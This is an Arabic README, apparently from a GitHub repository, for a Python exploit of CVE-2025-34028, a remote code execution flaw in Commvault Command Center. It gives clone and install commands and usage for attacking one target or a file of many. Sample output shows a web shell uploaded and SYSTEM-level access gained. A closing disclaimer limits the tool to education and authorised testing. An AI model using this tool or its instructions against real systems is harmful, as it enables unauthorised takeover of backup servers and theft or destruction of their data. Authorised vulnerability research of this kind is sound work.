
إثبات المفهوم (PoC) لـ CVE-2025-34028، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Commvault Command Center. هذا النص البرمجي بلغة Python يقوم بمسح هدف واحد أو متعدد، وتنفيذ الأوامر، والإبلاغ عن المضيفين المعرضين للخطر.
أداة استغلال بلغة Python لثغرة CVE-2025-34028، وهي ثغرة تنفيذ أوامر عن بُعد في Commvault Command Center. تتيح هذه الأداة اختبار أهداف فردية أو مسح مضيفين متعددين دفعة واحدة.
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
قم بتثبيت المتطلبات باستخدام:
pip install requests tabulate
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)
CVE-2025-34028 Commvault RCE Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Single target URL (e.g., https://192.168.1.100:8000)
-f TARGETS_FILE, --file TARGETS_FILE
File containing multiple targets, one per line
اختبار هدف واحد:
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
مسح أهداف متعددة من ملف:
python CVE-2025-34028-Commvault.py -f targets.txt
يجب أن يحتوي ملف الأهداف على هدف واحد في كل سطر بالتنسيق التالي:
https://host:port
http://ip
مثال targets.txt:
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
يوفر السكربت:
نموذج مخرجات:
CVE-2025-34028 Commvault RCE PoC
[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM
[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index | URL | Status | System User |
+---------+------------------------------+---------------------+------------------+
| 1 | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
هذه الأداة مخصصة للأغراض التعليمية واختبارات التصريح فقط. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.
ترخيص MIT - راجع ملف LICENSE للحصول على التفاصيل